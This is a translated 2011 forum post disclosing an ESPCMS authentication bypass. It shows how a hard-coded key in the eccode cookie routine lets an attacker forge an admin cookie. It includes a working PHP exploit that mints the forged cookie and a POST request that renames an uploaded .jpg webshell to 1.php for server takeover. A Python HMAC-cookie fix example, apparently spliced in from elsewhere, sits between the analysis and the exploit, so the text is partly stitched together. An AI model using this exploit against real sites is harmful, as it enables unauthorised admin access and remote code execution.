ESPCMS 0day vulnerability analysis and the official fix

Author: hack1990   Posted: 11-01-19   Views: 460

Publication date: 2011-01-17
Published by: ★黑小子★

Affected versions: unknown
Official site: http://www.ecisp.cn

Vulnerability type: cookie forgery
Description: obtain a cookie, modify it to spoof an admin session, enter the backend, then upload a .jpg and turn it into a shell (getshell).

Code analysis:

```php
function softbase($admin_purview = false) {
    header("Content-Type: text/html; charset=utf-8");
    $this->dbmysql();
    $this->commandinc();
    $this->systemfile();
    $this->cachedb();
    if ($admin_purview) {
        $this->admin_purview();
    }
}
```

 

admin_purview is the function that checks the login state.

Now look at it:

 

```php
function admin_purview() {
    if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') {
        $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G');
        $esp_powerlist = $this->fun->accept('esp_powerlist', 'G');
        $gettype = false;
    } else {
        $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');
        $esp_powerlist = $this->fun->accept('esp_powerlist', 'C');
        $gettype = true;
    }

    $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE')); // The rest doesn't matter much; this line is the key part. by Black Boy

    $this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE'));

    list($this->esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $this->esp_powerid, $this->esp_inputclassid, $this->esp_softurl) = $arr_purview;

    if ($gettype) {
        // Checks whether these values are present: if they are, the check is passed; if not, the user is sent back to the login page. The rest is simple and not explained. Black Boy
        if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) {
            $condition = 0;
        } else {
            $condition = 1;
        }
    } else {
        if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) {
            $condition = 0;
        } else {
            $condition = 1;
        }
    }

    if ($condition == 0) {
        if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') {
            header('location: index.php?archive=adminuser&action=login');
            exit();
        }
    } else {
        if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') {
            header('location: index.php?archive=management&action=tab&loadfun=mangercenter');
            exit();
        }
    }
}
```

 

So the crux now is the eccode "encryption" routine.

Here is the code:

 

 

```php
function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%') {
    $result = '';
    if ($operation == 'ENCODE') {
        for ($i = 0; $i < strlen($string); $i++) {
            $char = substr($string, $i, 1);
            // Note the "- 1": when $i % strlen($key) is 0 the offset is -1, so substr() returns the last key character.
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            // Each byte is shifted by the key byte; no integrity protection of any kind.
            $char = chr(ord($char) + ord($keychar));
            $result .= $char;
        }
        $result = base64_encode($result);
        $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
    } elseif ($operation == 'DECODE') {
        $data = str_replace(array('-', '_'), array('+', '/'), $string);
        $mod4 = strlen($data) % 4;
        if ($mod4) {
            $data .= substr('====', $mod4);
        }
        $string = base64_decode($data);
        for ($i = 0; $i < strlen($string); $i++) {
            $char = substr($string, $i, 1);
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char = chr(ord($char) - ord($keychar));
            $result .= $char;
        }
    }
    return $result;
}
```

 

Obviously there is no need to write a separate decryption routine: the process simply runs in reverse. Working out each step of the encoding by hand would be tedious.

The core vulnerability is that the key, $key='@LFK24s224%@safS3s%1f%', is a hard-coded constant shipped in the source rather than a randomly generated, per-installation value.
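The eccode routine above is a fixed-key byte shift wrapped in URL-safe base64: it hides the cookie fields from casual inspection but gives admin_purview no way to tell a cookie the server issued from one assembled by someone who has read the source, which is exactly what the analysis exploits. The Python below is an added example, not ESPCMS code, showing the property a login cookie needs instead: an HMAC tag under a secret that is generated per installation, verified in constant time before any field is trusted. The function names (sign_admin_cookie, verify_admin_cookie), INSTALL_SECRET and the four-field layout are assumptions made for the illustration.

```python
import base64
import binascii
import hashlib
import hmac
import secrets

# Assumption: a 32-byte secret generated once at install time and stored
# outside the web root. It is generated here at import so the example runs
# stand-alone; in a deployment it must never be a constant in the source tree.
INSTALL_SECRET = secrets.token_bytes(32)


def _b64u(raw: bytes) -> str:
    """URL-safe base64 without padding (the same alphabet tweak eccode performs)."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_admin_cookie(adminuserid, username, user_agent, powerid, secret=INSTALL_SECRET):
    """Build 'payload.tag' where tag = HMAC-SHA256(secret, payload)."""
    if "|" in username:
        raise ValueError("username may not contain the field separator")
    ua_hash = hashlib.sha256(user_agent.encode("utf-8")).hexdigest()
    payload = "|".join([str(adminuserid), username, ua_hash, str(powerid)]).encode("utf-8")
    tag = hmac.new(secret, payload, hashlib.sha256).digest()
    return _b64u(payload) + "." + _b64u(tag)


def verify_admin_cookie(cookie, user_agent, secret=INSTALL_SECRET):
    """Return the trusted fields, or None if the tag or the binding does not check out."""
    try:
        payload_part, tag_part = cookie.split(".", 1)
        payload = _b64u_decode(payload_part)
        tag = _b64u_decode(tag_part)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    # Constant-time comparison, and the tag is checked before any field is parsed.
    if not hmac.compare_digest(tag, expected):
        return None
    fields = payload.decode("utf-8").split("|")
    if len(fields) != 4:
        return None
    adminuserid, username, ua_hash, powerid = fields
    if not hmac.compare_digest(ua_hash, hashlib.sha256(user_agent.encode("utf-8")).hexdigest()):
        return None
    return {"adminuserid": adminuserid, "username": username, "powerid": powerid}


def demo():
    """Exercise the scheme with constructed values; returns three booleans."""
    ua = "Mozilla/5.0 (constructed sample User-Agent)"
    cookie = sign_admin_cookie(7, "editor", ua, 2)
    genuine_ok = verify_admin_cookie(cookie, ua) == {"adminuserid": "7", "username": "editor", "powerid": "2"}

    # Modified payload (claims adminuserid 1) with the original tag left in place.
    payload_part, tag_part = cookie.split(".", 1)
    altered = _b64u_decode(payload_part).replace(b"7|editor", b"1|admin")
    tampered_rejected = verify_admin_cookie(_b64u(altered) + "." + tag_part, ua) is None

    # A cookie minted under a different secret (another install) is rejected too.
    foreign = sign_admin_cookie(1, "admin", ua, 1, secret=secrets.token_bytes(32))
    foreign_rejected = verify_admin_cookie(foreign, ua) is None

    return genuine_ok, tampered_rejected, foreign_rejected


if __name__ == "__main__":
    print(demo())
```

Two points follow from the comparison with admin_purview. First, the User-Agent binding it performs (md5(admin_AGENT) against a cookie field) adds nothing on its own, because the client chooses the User-Agent header; only the tag, computed under a secret the client does not have, stops a modified payload. Second, the secret must be created at install time and kept out of the distributed source, since a key that every installation shares is effectively public once one copy of the code is read.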

 

 

EXP:

```php
<?php
function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%') {
    $result = '';
    if ($operation == 'ENCODE') {
        for ($i = 0; $i < strlen($string); $i++) {
            $char = substr($string, $i, 1);
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char = chr(ord($char) + ord($keychar));
            $result .= $char;
        }
        $result = base64_encode($result);
        $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
    } elseif ($operation == 'DECODE') {
        $data = str_replace(array('-', '_'), array('+', '/'), $string);
        $mod4 = strlen($data) % 4;
        if ($mod4) {
            $data .= substr('====', $mod4);
        }
        $string = base64_decode($data);
        for ($i = 0; $i < strlen($string); $i++) {
            $char = substr($string, $i, 1);
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char = chr(ord($char) - ord($keychar));
            $result .= $char;
        }
    }
    return $result;
}

define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']);
$name = $_POST['name'];
$s = md5(admin_AGENT);
$ecisp_admininfo = '1|admin|e00cf25ad42683b3df678c61f42c6bda|' . $s . '|1|1|' . md5("http://" . $name . "/adminsoft");
$a = eccode($ecisp_admininfo, 'ENCODE');
echo "ecisp_admininfo=" . $a . ";esp_powerlist=hqy4;" . "<br><br><br>";
?>
<form method="post" action="http://www.hackersb.com/sb/test.php" enctype="multipart/form-data" id="upload">
  <label>
    <input name="name" type="text" value="www.t00ls.net" /> by:Black Boy http://www.hackersb.com/
  </label>
  <div></div>
  <input name="respondids" value="给我COOKIES " class="coolbg np" type="submit">
</form>
```

http://www.hackersb.com/sb/test.php is the address of this file.

Note: $s is derived from the User-Agent of the current browser, so whichever browser you run this script in is the one you must use for the cookie spoofing.

Once you have the cookie, modify it to spoof the session and enter the backend.

Then, under content add, upload a file: rename the webshell to .jpg and upload it.
Finally, POST:

```
/adminsoft/index.php?archive=filemanage&action=renamesave

path=/upfile/&dirname=product.jpg&newdirnam=1.php
```

product.jpg is the uploaded JPG webshell file.

The webshell then lives at upfile/1.php.

The vendor has already published a fix: http://www.ecisp.cn/html/cn/aboutus/news/124.html
